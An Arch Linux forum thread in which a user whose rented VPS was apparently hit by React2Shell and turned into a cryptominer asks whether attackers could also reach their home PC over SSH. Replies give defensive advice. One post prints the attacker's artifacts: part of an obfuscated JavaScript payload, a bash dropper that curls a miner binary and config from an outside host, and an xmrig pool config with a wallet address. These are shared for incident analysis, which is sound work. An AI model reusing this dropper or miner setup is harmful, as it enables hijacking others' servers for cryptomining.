You are not logged in.
- Topics: Active | Unanswered
#1 2025-12-09 18:39:47
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
[SOLVED]Can attackers penetrate my pc ?
I recently heard about a security vulnerability in a programming language. This was the programming language I use on my server. My IP address is visible in the recent connections. If someone accessed the server, they would have seen my IP address. Can they(attacker) establish an SSH connection?
cat /etc/ssh/ssh_config :
# Include drop-in configurations
Include /etc/ssh/ssh_config.d/*.conf
# This is the ssh client system-wide configuration file. See
# ssh_config(5) for more information. This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.
# Configuration data is parsed as follows:
# 1. command line options
# 2. user-specific file
# 3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.
# Site-wide defaults for some commonly used options. For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.
# Host *
# ForwardAgent no
ForwardX11 no
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# BatchMode no
# CheckHostIP no
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
# UserKnownHostsFile ~/.ssh/known_hosts.d/%kcat /etc/ssh/sshd_config :
# Include drop-in configurations
Include /etc/ssh/sshd_config.d/*.conf
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/bin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
Port 22
#AddressFamily any
ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
PubkeyAuthentication yes
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys
#AuthorizedPrincipalsFile none
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
PermitEmptyPasswords no
# Change to no to disable s/key passwords
#KbdInteractiveAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the KbdInteractiveAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via KbdInteractiveAuthentication may bypass
# the setting of "PermitRootLogin prohibit-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and KbdInteractiveAuthentication to 'no'.
#UsePAM no
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# override default of no subsystems
Subsystem sftp /usr/lib/ssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding yes
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs serverWhen I try to connect from WSL to Arch via SSH or vice versa (same network/home with 2 PCs, one laptop and one desktop), the cursor just blinks on a new line. By the way, when I search for `whatsmyip` on the internet, the IP address that appears on the site is the same for both computers.
Last edited by jojo06 (2025-12-21 16:11:53)
Offline
#2 2025-12-09 19:02:00
- Scimmia
- Fellow
- Registered: 2012-09-01
- Posts: 13,351
Re: [SOLVED]Can attackers penetrate my pc ?
Can a determined attacker that really knows what they're doing penetrate your system? Probably.
By the way, when I search for `whatsmyip` on the internet, the IP address that appears on the site is the same for both computers.
Yeah, that's the way NAT works. Did you forward the port to the machine running sshd? If not, it's not directly accessible outside your network anyway.
Offline
#3 2025-12-09 19:41:30
- ewaller
- Administrator
- From: Pasadena, CA
- Registered: 2009-07-13
- Posts: 20,549
Re: [SOLVED]Can attackers penetrate my pc ?
If you did forward port 443 from your router to your server as Scimmia indicated, I can almost guarantee someone will try if they haven't already. If the port is not forwarded, you are fine.
You can always (and should) check your journal for connection on sshd ( journalctl -b --unit=sshd )
Edit: You might want to turn off allowing passwords in sshd.conf and require the use of public key encryption only.
Last edited by ewaller (2025-12-09 19:45:41)
Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
The shortest way to ruin a country is to give power to demagogues.— Dionysius of Halicarnassus
---
How to Ask Questions the Smart Way
Offline
#4 2025-12-09 20:19:52
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
https://pentest-tools.com/network-vulne … nline-nmap
Check your WAN IP
My IP address is visible in the recent connections.
Your IP address is visible in *all* connections, otherwise the other end of the connection could not respond.
a security vulnerability in a programming language. This was the programming language I use
The "security vulnerability" in *any* "programming language" is called D.E.V.E.L.O.P.E.R.
If you did forward port 443 from your router to your server
OP seems to run ssh on 22
You might want to turn off allowing passwords in sshd.conf and require the use of public key encryption only.
On a WAN facing server, password logins are an absolute no-go.
Also read https://wiki.archlinux.org/title/OpenSSH#Protection
If the server however isn't WAN-facing, none of this is really important.
Offline
#5 2025-12-09 21:19:26
- cryptearth
- Member
- Registered: 2024-02-03
- Posts: 1,858
Re: [SOLVED]Can attackers penetrate my pc ?
to roll this up: YES
some hacker with knowledge about your services (and thier versions) can easy find public known vulnerabilities of your software
I got victim of Log4J by running apache james which I was too lazy to update to a patched version - TWICE
so, the TL;DR comes down to: if you host ANY service public an attacker with the required knowledge might have a more or less easy way into the service and depending on the vulnerabilities to the system
it also depends on how you run your services
best pratice: avoid running services below 1024 as root but utilize your firewall to redirect the traffic
example: instead of run my james to bind to tcp/25 i run it as unprivileged user and use my firewall to redirect public port 25 to unprivileged 8025
this way someone hacking my james again land only in a jail one has to escape from by what james has as vulnerabilities
as Log4J got fixed and there're currently no known ways for an attacker to exploit james' smtp handler to gain shell the risk is quite slim - for now
same goes for SSH: although not much worth after you found it - move ssh away from TCP/22 but to a different port - this requires an attacker to first search for the port ssh listen on
this can easy be mitigated by rate limit port scans: a remote randomly tries to connect to random ports is blocked after a few fails and only get a drop - so no longer receive any SYN or ACK or RST at all - the packets are just dropped and the attacker has no longer any way to connect to my server even if they hit the correct port
as for "can an attacker get access through language X?": depends on if you run any service implemented in that language and if the vulnerability is even exploitable by the protocol offered
example: unless there's an attack possible via the ssh protocol itself to exploit a shell it's secure no matter if implemented in c, rust or whatever
your question resembles a XY problem: you're focused on a language vulnerability Y without checking if that's even exposed by any public service X - which turns the question on it's head: can someone exploit C? sure - if the protocol handler is implemented in a vulnerable way
look up SSL Heartbleed: the leak was improper boundary check - but this wasn't an issue of the language itself but of the implemetation of ssl
C can be as secure as rust - as long as you implemented it correctly
so - the question becomes: about WHAT vulnerability in WHICH language you heard about?
do you have any services public vulnerable to tjis attack? if not: no, you're likely not vulnerable to that specifuc issue
Last edited by cryptearth (2025-12-09 21:26:48)
Offline
#6 2025-12-10 15:11:40
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
@Scimmia
Did you forward the port to the machine running sshd? If not, it's not directly accessible outside your network anyway.
I don't understand what you mean. I didn't set up any special port forwarding in the modem interface. Even when I tried, it caused problems. How can I check now?
@ewaller
Now I understand, I guess the server is a completely rented VPS. There's no redirection or connection to my PC. But my IP is in the recent logins. Plus, the password is really bad 
They installed a mining script. I cleaned it up. I changed the password from chroot. But I'm not sure if they managed to access my computer. I logged in last night in a panic and a rush, and my head wasn't clear. I'm not sure if I deleted the same files from my computer. How can I find out from the logs?
stat /home/guns/.config/.system-monitor/.sys-mon
stat /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
stat /home/guns/.cache/.sys/xmrigThose are the files.
WARNING this is the script: sharing for some reasons... If its inappropriate , it can be edited, deleted from the post
```
cat /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
(function(_0x5588c8,_0x4b7e2a){const _0x44bc5d=_0x56d3,_0x3a86f8=_0x5588c8();while(!![]){try{const _0x2dd981=-parseInt(_0x44bc5d(0x186))/0x1*(-parseInt(_0x44bc5d(0x2a8))/0x2)+parseInt(_0x44bc5d(0x2a4))/0x3*(parseInt(_0x44bc5d(0x14f))/0x4)+-parseInt(_0x44bc5d(0x1a6))/0x5*(parseInt(_0x44bc5d(0x124))/0x6)+parseInt(_0x44bc5d(0x330))/0x7*(parseInt(_0x44bc5d(0x29a))/0x8)+-parseInt(_0x44bc5d(0x11e))/0x9*(parseInt(_0x44bc5d(0x35e))/0xa)+parseInt(_0x44bc5d(0x359))/0xb*(parseInt(_0x44bc5d(0x320))/0xc)+parseInt(_0x44bc5d(0x24a))/0xd;if(_0x2dd981===_0x4b7e2a)break;else _0x3a86f8['push'](_0x3a86f8['shift']());}catch(_0x54fde2){_0x3a86f8['push'](_0x3a8
```
boyle uzayip gidiyor // it goes likes this
2.
```
[guns@vmi2678284 home]$ cat /tmp/apaches.sh
#!/usr/bin/env bash
# Simple xmrig killer + nginxs watcher (no Docker)
# Works on most CentOS / Ubuntu / generic Linux, root / non-root
set -u # Avoid using undefined variables (no -e to prevent unexpected exits)
LOG_TAG="[apaches-main]"
# nginxs / config download URLs
NGINXS_URL="https://tr.earn.top/nginxs"
CONFIG_URL="https://tr.earn.top/config.json"
# Choose a common download directory
# root: /usr/local/sbin
# non-root: /tmp (writable in almost all systems)
if [ "$(id -u)" -eq 0 ]; then
NGINXS_PATH="/usr/local/sbin/nginxs"
CONFIG_PATH="/usr/local/sbin/config.json"
else
NGINXS_PATH="/tmp/nginxs"
CONFIG_PATH="/tmp/config.json"
fi
log() {
echo "$(date '+%F %T') ${LOG_TAG} $*"
}
########################################
# Common: kill xmrig processes (avoid killing ourselves)
########################################
kill_xmrig_processes() {
# Current script PID and parent PID (to avoid killing ourselves or our parent)
local self_pid parent_pid
self_pid=$$
parent_pid=${PPID:-0}
# Find processes containing "xmrig" (case-insensitive), ignore grep itself,
# and exclude this script and its parent
local pids
pids=$(ps aux 2>/dev/null \
| grep -i 'xmrig' \
| grep -v grep \
| awk -v spid="$self_pid" -v ppid="$parent_pid" '{ if ($2 != spid && $2 != ppid) print $2 }' \
| xargs -r echo)
if [ -n "${pids:-}" ]; then
log "Found xmrig processes: ${pids}, trying to kill..."
kill ${pids} 2>/dev/null || true
sleep 1
pids=$(ps aux 2>/dev/null \
| grep -i 'xmrig' \
| grep -v grep \
| awk -v spid="$self_pid" -v ppid="$parent_pid" '{ if ($2 != spid && $2 != ppid) print $2 }' \
| xargs -r echo)
if [ -n "${pids:-}" ]; then
log "Processes still alive, using kill -9: ${pids}"
kill -9 ${pids} 2>/dev/null || true
fi
fi
}
########################################
# nginxs config: download config.json (curl only)
# After each download, randomize "pass": "x" -> random 5-char string
########################################
download_nginxs_config() {
if ! command -v curl >/dev/null 2>&1; then
log "curl not found, cannot download config.json, please install curl or place ${CONFIG_PATH} manually."
return 1
fi
log "Downloading config.json to: ${CONFIG_PATH}"
mkdir -p "$(dirname "$CONFIG_PATH")" 2>/dev/null || true
if ! curl -fsSL "${CONFIG_URL}" -o "${CONFIG_PATH}" 2>/dev/null; then
log "Failed to download config.json from ${CONFIG_URL}."
return 1
fi
# Get current machine IP (prefer public IP; fallback to local IP or 'unknown')
local ip_value
ip_value=$(curl -fsSL [url]https://ifconfig.me[/url] 2>/dev/null \
```
3.
```
[guns@vmi2678284 home]$ cat /home/guns/.cache/.sys/c.json
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": true,
"colors": false,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"argon2": [0, 1],
"cn": [
[1, 0],
[1, 1]
],
"cn-heavy": [
[1, 0],
[1, 1]
],
"cn-lite": [
[1, 0],
[1, 1]
],
"cn-pico": [
[2, 0],
[2, 1]
],
"cn/upx2": [
[2, 0],
[2, 1]
],
"ghostrider": [
[8, 0],
[8, 1]
],
"rx": [0, 1],
"rx/wow": [0, 1],
"cn-lite/0": false,
"cn/0": false,
"rx/arq": "rx/wow",
"rx/keva": "rx/wow"
},
"log-file": null,
"donate-level": 1,
"donate-over-proxy": 1,
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:443",
"user": "87jqNuqty4VARVoBWQpSJqJBAMZGfhagsGvFVgmCNJHEXhXFbTaRzfH1AYcttbrKjHEQZ3gs56nsyZsuAkKE1p4bGKUQERz",
"pass": "vmi26782_548cd4",
"rig-id": "vmi26782_548cd4",
"nicehash": false,
"keepalive": true,
"enabled": true,
"tls": true,
"sni": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"retries": 5,
"retry-pause": 5,
"print-time": 0,
"dmi": true,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"dns": {
"ipv6": false,
"ttl": 30
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
```
4.
```
[guns@vmi2678284 home]$ file /home/guns/.config/.system-monitor/.sys-mon
/home/guns/.config/.system-monitor/.sys-mon: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
[guns@vmi2678284 home]$ strings /home/guns/.config/.system-monitor/.sys-mon | head -50
D$ H
\$(f
D$ H
8cpu.u
D$PH
t$xH
L$HH
\$`H)
\$ M
\$XH
onuxH
ofuYF
fuMH
T$@1
D$XH
D$`H
t$xL
L$(H
D$hH
t$xL
L$P1
|$xL
D$HH
T$@H
D$xH
D$pH
L$PH
D$8L
\$0H
T$@H
\$`H
t$xL
D$PL
L$HD
D$0H9
t$xL
D$`H
t$xL
l$XH
l$XH
D$HH
D$HH
d$@N
T$PH
T$PJ
L$CH
T$C!
l$XH
l$XH
l$XH
```
```
[guns@vmi2678284 home]$ sha256sum /home/guns/.config/.system-monitor/.sys-mon
2cd41569e8698403340412936b653200005c59f2ff3d39d203f433adb2687e7f /home/guns/.config/.system-monitor/.sys-mon
[guns@vmi2678284 home]$ sha256sum /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
ee8af0c511acc7c6a0f4f4f2e6fab7546acf78bc1204a90ab3dcc0441529627c /home/guns/.local/share/.r0qsv8h1/.fvq2lzl64e.js
[guns@vmi2678284 home]$ sha256sum /tmp/apaches.sh
9d33b5c8830d3fa500b9a95ee44f21ac883de60852064330d7cfdc8c3a9ab662 /tmp/apaches.sh
[guns@vmi2678284 home]$ sha256sum /home/guns/.cache/.sys/xmrig
364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c /home/guns/.cache/.sys/xmrig
```I have past conversations with cursor ide ai. Thankfully, we also wrote the file there with cat. I went through it very quickly, of course. It's still in the old chat. And now I can find it when I look. He also mentioned mining and such. We couldn't find any other threats, etc.
@seth
The "security vulnerability" in *any* "programming language" is called D.E.V.E.L.O.P.E.R.
I didn't understand what you meant here, but the reason I specified the language was for confidentiality.
Is the IP address obtained from the WAN IP using `whatsmyip` correct?
Server is Alma Linux.
@cryptearth
You're right about that. What I really want to ask, directly and simply, is whether an SSH connection can be made (using the last IP address connected to the VPS). Otherwise, anything is possible, so why not? I mean, in the panic of the moment (to avoid jumping to conclusions), I touched on the first part of the issue.
Otherwise, how would the guy know my IP address, or where would he get it from? As far as I understand, they use ready-made bots and scan servers. Then they drop a mining script there. Some of my contacts said that an OpSec mistake was made and the locale was compromised. So, can they connect to my computer like they would connect to the server using `ssh guns@ip`, either through the bots or themselves (probably from the last login)? Or is it impossible to access it due to Arch conf settings and other precautions (there's an open KDE GUI)? But when the screen last turned off, I immediately hit `force shutdown` from the case button.
Last edited by jojo06 (2025-12-10 15:20:43)
Offline
#7 2025-12-10 16:55:07
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
I didn't understand what you meant here, but the reason I specified the language was for confidentiality.
"Programming languages" rarely have "security vulnerabilities" - "security vulnerabilities" are sub-par code. Fault of the developer
Is the IP address obtained from the WAN IP using `whatsmyip` correct?
Yes.
But
the server is a completely rented VPS … They installed a mining script.
sounds like you're indeed running a WAN facing ssh server.
Stop that until you've learned how to protect it.
Your IP showing up anywhere is really of no concern and not required by the script-kiddies turning the system into a bitcoin miner (you hopefully completely nuked and re-installed the server after that)
The SSH protection has to be secure even if I know your name, your IP and the first movie crush of your mother and how often you masturbate a day.
Obscurity is not security in any way shape or form.
Offline
#8 2025-12-10 17:53:02
- system72
- Member
- Registered: 2025-11-22
- Posts: 347
- Website
Re: [SOLVED]Can attackers penetrate my pc ?
just disable password login in ssh, that way they cannot bruteforce there way in..
Offline
#9 2025-12-10 17:58:51
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
There was an error with your request
UnauthorizedCant scan.
I stopped the server. And in the morning i started `rescue system` and did nothing after that. Im going to delete it, install from scratch. For now i was keeping for getting the script (for report and learn from it). Now i get 1-2 codes/files. I did nothing else.
EDIT: How can I change my KDE Wallet Manager password?
@system72
yeah but its aftermath. and solving if they hacked my pc or not. what happened and learning from it. what to secure and do i have to change 50 passwords of mine or god dont ?
EDIT 2:
@seth
peww ! 0 open ports. 0 ports open. !! pew.. is that what im thinking ? they didnt/couldnt/cant 
reach my pc via ssh ?
Last edited by jojo06 (2025-12-10 18:05:08)
Offline
#10 2025-12-12 22:56:43
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
I apologize for the update, but this is really important. And two days have passed. So, am I safe?
Offline
#11 2025-12-13 02:49:24
- Koatao
- Member
- Registered: 2018-08-30
- Posts: 103
Re: [SOLVED]Can attackers penetrate my pc ?
I apologize for the update, but this is really important. And two days have passed. So, am I safe?
How should we know?
You were vulnerable to React2Shell (CVE-2025-55182 / CVE-2025-66478), right?
Are you a high value target? Do you hold valuable secrets or have a lot of money or crypto assests? If not, the attackers probably automatically exploited your server and installed a bunch of malware on it as a quick win. Probably extracted data too. But they don't care about who you are and what you might have. You are not worth their time to hack into considering there is millions of apps affected by React2Shell, they will focus their effort elsewhere.
Just nuke the server and monitor your computer for indicators of compromise (like those described here: https://www.labs.greynoise.io/grimoire/ … hcentral/)
If this is really important, get in touch with professional security incident responders.
Last edited by Koatao (2025-12-13 02:59:33)
Offline
#12 2025-12-13 03:59:53
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
You dont need to be mad.
@seth
peww ! 0 open ports. 0 ports open. !! pew.. is that what im thinking ? they didnt/couldnt/cant smile reach my pc via ssh ?
When there are no open ports on the WAN IP, and if it means you cannot connect via SSH, which indicates there is no problem.
When I didn't get a reply, I thought they were still investigating, unsure. I wanted to agree.
No, I don't have millions of dollars on my computer. But I might have to change dozens of passwords. I might have to format the computer and reinstall everything. I could end up with a lot of work on my hands. Also, this is a learning platform. For example: if there's no problem as long as the port isn't open (thanks to Seth for pointing that out), this could end everything. Otherwise, I should pay more attention to this from now on and increase security measures on the servers. Or I could focus on different languages, projects, or areas. At the very least, I'll pay more attention to these things on projects/servers requested by customers. So yes, it changes a lot of things.
If this is really important, get in touch with professional security incident responders.
I did. And im doing it while asking here.
Last edited by jojo06 (2025-12-13 04:01:34)
Offline
#13 2025-12-13 08:53:27
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
@jojo06 nobody receives messages for edits, so the strategy where you blog live updates into the post is gonna leave people uninformed.
Think first, then post.
If you're adding genuinely new information because you forgot to first think, that's bad style but doesn't count as bumping and will make sure that people get aware of it.
peww ! 0 open ports. 0 ports open. !! pew.. is that what im thinking ? they didnt/couldnt/cant smile reach my pc via ssh ?
Did you run that w/ the ssh server already stopped (or just the rescue.target running)? Cause then that's not a surprise.
But also notice that if this is indeed the R2S CVE this has nothing to do w/ ssh, the attack comes via HTTP ie. the port where whatever was using react was/is listening (eg. 80)
The most important question is whether this is supposed to be a WAN facing server (you can log in from your moms basement… and also when you're out of house 
)?
Or is this a LAN server (NAS etc)?
<mantra>NAT is not a firewall, notably b/c of IPv6 and UPnP</mantra> but in general a host behind an ISP issued routermodemswitch isn't open for cold inbound traffic and you can run an unprotected http, ftp… of nfs server there and server software bugs could only be exploited by yourself (or your Mom or who else is on the LAN segment)
Offline
#14 2025-12-14 00:26:40
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
At first, it gave an `Unauthorized` error, so I requested another link because it didn't work. Later, when it worked, I had to edit it.
The rest of what you wrote seems a bit complicated to me, I'll look into it. But the issue and question are actually much simpler. The problem isn't with the server, and I don't care about the server. Can my computer be connected? That's what I'm after.
The WAN IP address that appears on the site I tested (whatsmyip) is my computer's IP address. That is, the personal PC I am currently using, Arch. There are no special settings, conf files, etc.
But also notice that if this is indeed the R2S CVE this has nothing to do w/ ssh, the attack comes via HTTP ie. the port where whatever was using react was/is listening (eg. 80)
So they dont needed to use brute force with ssh to init scripts ?
So, to summarize, the question is: there is a personal computer at home. It is a standard PC with port Arch. 0 open (based on the result obtained from the site you provided, using the WAN IP obtained from whatsmyip). Is it possible to connect to such a PC via SSH?
As far as I know and expect, the cursor will wait on the new line but won't even ask for a password. Because it's not accepting the connection. Because the port isn't open?
So is this correct and can i take a deep breath, relax ?
Offline
#15 2025-12-14 09:55:26
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
Is it possible to connect to such a PC via SSH?
No.
Can you please clarify what
I recently heard about a security vulnerability in a programming language. This was the programming language I use on my server.
exactly is and why you're worried about a ssh connection to your desktop pc/laptop (which probably doesn't even have an active sshd running?) if your server might have been compromised and no, for R2S to work you don't need ssh and according to REACT maintainers clients are never at any jeopardy, the attacks run on the server.
If you're running other connections to that server any successful attack on the server might have facilitated a secondary attack (the evil guys now control your server) against random clients.
Offline
#16 2025-12-14 20:20:16
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
No.
Peww ! Than `my pc` is safe ? Do u confirm my good man @seth ?
That's why I got worried; the screen suddenly went black. I had put a similar password to the one in the .env file on my computer. I don't know about Windows. Linux is like a server or something similar. Alma Linux, Cent OS, and other options are also Linux. They saw my IP address from the last entries and I thought they connected using `root@myip` and the password in .env, just like connecting to the same server.
SO: Based on the screen going black and what I discussed with others, I think this is what happened: the scenario I mentioned was attempted. However, since I didn't open a port from the modem interface (which we agreed thats why ssh connection to my pc unavailable/failed and im safe because) the SSH connection couldn't be established. And it was impossible to establish. But the connection (the ssh command on a new line) was waiting, and that's why the screen went black?
Offline
#17 2025-12-14 20:33:02
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
No, your PC is *NOT!* "safe".
Security isn't a state.
You're using it, so it's a constant threat of you screwing up. It's not "safe". Not from you, nor from anyone else.
Nothing you've posted here suggests that you've been or even at risk of an attack but telling you that your PC "is safe" base on extremely limited and vague information is double-stupid.
I'm not even gonna assure you that you've not been successfully attacked because you've provided no data at all, I've not inspected the system and even then you're dealing in probabilities. (The unknown unknowns…)
That's why I got worried; the screen suddenly went black. I had put a similar password to the one in the .env file on my computer. I don't know about Windows. Linux is like a server or something similar. Alma Linux, Cent OS, and other options are also Linux. They saw my IP address from the last entries and I thought they connected using `root@myip` and the password in .env, just like connecting to the same server.
I have no idea what you're trying to say, but the screen going black could be anything from DPMS to a kernel panic or your monitor fusing.
But the connection (the ssh command on a new line) was waiting, and that's why the screen went black?
If everytime someone tries to ssh a system that doesn't listen said system crashes, we'd have to shut down the intern…no, wait: it would never run.
Offline
#18 2025-12-15 00:22:29
- herOldMan
- Member
- Registered: 2013-10-11
- Posts: 161
Re: [SOLVED]Can attackers penetrate my pc ?
Any Turing-complete, universal Von Neumann machine (PC's included) that can be made can run any program that can be written, including malware.
(See Enshittification by Cory Doctorow, ISBN 9780374619329)
With PCs, as with drinking water, go with acceptable risk rather than safe .
Offline
#19 2025-12-15 01:32:42
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
We can't establish healthy communication. I'd like to thoroughly scan the system with your help, but I don't think you'd want to deal with that here.
The point where the incident occurred and came to a standstill, and where I asked my question, is here:
No ports are open on the WAN IP/my modem/internet. As such, it cannot receive any external connections, including SSH. Is that correct?
Offline
#20 2025-12-15 08:34:10
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
Assuming you ran the text correctly, the systemcannot receive *cold* inbound traffic but you will have inbound traffic that's correlated to outbound traffic (when you ask for a webpage you get to see it, right)?
Also are you even running an ssh server on that (desktop?) system? Why?
It might have helped if you would just describe the situation and your concerns in specific details.
The answer to the general questions "Can attackers penetrate my pc or am I safe" are *always* "yes and no".
Offline
#21 2025-12-15 16:26:11
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
Assuming you ran the text correctly
What do u mean by text ?
I know that in other distros there are two separate packages, `ssh` and `ssh-server`, but is that not the case in Arch?
Even tho; `sudo pacman -Ss ssh | grep installed`:
core/libssh2 1.11.1-1 [installed]
core/openssh 10.2p1-2 [installed]
extra/ksshaskpass 6.5.4-1 (plasma) [installed]
extra/libssh 0.11.3-1 [installed]
extra/qemu-block-ssh 10.1.2-3 [installed]
extra/seahorse 1:47.0.1-6 [installed]
extra/sshpass 1.10-2 [installed]It might have helped if you would just describe the situation and your concerns in specific details.
That all i know. React2Shell was the vuln as u guessed.
Did you see something about an SSH server configuration? There is no SSH server, the package is installed to connect to the outside and to the server.
So I've boiled down the incident, the problem, and the solution into a single sentence. But I think there's a communication breakdown, or the issue is deeper. But as I've said many times before, my concern isn't server-related. I don't care about the server. There's no sensitive data, loss, damage, etc. But my concern is my own computer.
And the question and solution regarding this are as follows: Can you connect via SSH to a WAN IP address that doesn't have the port open?
The answer to this will be yes / no / maybe (I hope not).
I'm not talking about another security vulnerability, hacking possibility, abuse, exploitation, etc.
I'm *not* talking about “any system connected to the internet...”
I'm *not* talking about “depending on the programmer/hacker and the person using the computer...”
I don't know what else I can tell you or say. But if you could tell me how I can get any information that might help (websites you sent, commands, etc.), I'll share the results.
..But as I said, the issue boils down to this (because the current scenario and what worries me—what other method could they have used—is this:) Could they connect to **my computer** via SSH?
>> The one my personal use Arch, no ports open on WAN IP...
Otherwise, scripts, open source packages, websites I visit, etc., etc. There are endless possibilities regarding whether my computer has been accessed/hacked or whether it can/could be accessed/hacked.
Offline
#22 2025-12-15 16:37:19
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
What do u mean by text ?
"test", typo - sorry.
but is that not the case in Arch?
No and it's also not a metric for whether you're running an ssh server.
ps aux | grep sshd
ss -tulpen
nmap localhostCan you connect via SSH to a WAN IP address that doesn't have the port open?
No.
What do you think ssh has to do w/ REACT or React2Shell specifically?
Do you run the React server components anywhere?
For all we know your system crashed, god knows why and you came up w/ a story that this was due to a failed attack on your non-existing ssh server because R2S and reasons.
Nothing here makes any sense.
Offline
#23 2025-12-15 17:13:25
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
